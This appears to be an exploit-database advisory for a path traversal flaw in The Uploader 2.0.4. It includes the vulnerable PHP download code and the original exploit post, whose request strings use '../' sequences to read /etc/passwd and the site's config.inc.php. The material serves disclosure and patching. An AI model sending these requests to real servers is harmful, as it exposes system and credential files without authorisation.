The Uploader 2.0.4 Remote File disclosure Vulnerability

vendor:

The Uploader

by:

Xa7m3d

7,5

CVSS

HIGH

Remote File Disclosure

434

CWE

Product Name: The Uploader

Affected Version From: 2.0.4

Affected Version To: 2.0.4

Patch Exists: Yes

Related CWE: N/A

CPE: theuploader:theuploader:2.0.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 9.10

2010

The Uploader 2.0.4 Remote File disclosure Vulnerability

The Uploader 2.0.4 is vulnerable to a remote file disclosure vulnerability. This vulnerability is due to a lack of proper validation of user-supplied input in the 'filename' parameter of the 'api/download_launch.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This will allow the attacker to view the contents of arbitrary files on the server.

Mitigation:

Upgrade to the latest version of The Uploader, which is not vulnerable to this issue.

Source

Exploit-DB raw data:

=================================================
The Uploader 2.0.4 Remote File disclosure Vulnerability
=================================================

==============================================

# Script Name : The Uploader
# Version : [2.0.4]
# Language : php
# Author : Xa7m3d (H4K@hotmail.ch)
# Download : http://sourceforge.net/projects/theuploader
# Tested on : ubuntu 9.10

==============================================

File Disclosure :
in : api/download_launch.php

#######################################
$open=fopen($main['upload_directory'] . $_GET['filename'], "r"); <??(+)
$size=filesize($main['upload_directory'] . $_GET['filename']);
$read=fread($open, $size);
header("Content-Type: application/octet-stream");
header("Content-Length: " . $size);
header("Content-Transfer-Encoding: binary");
header("Content-Disposition: attachment; filename=" . $_GET['filename']); <??(+)
#######################################

3XP :

api/download_launch.php?filename=../../../../../etc/passwd

Example :

http://server/theuploader/api/download_launch.php?filename=../config.inc.php


T3AM Piracy Unlimited Tunisia : # Cyb3R H3LL # k[i]ng # La Haft Xroy #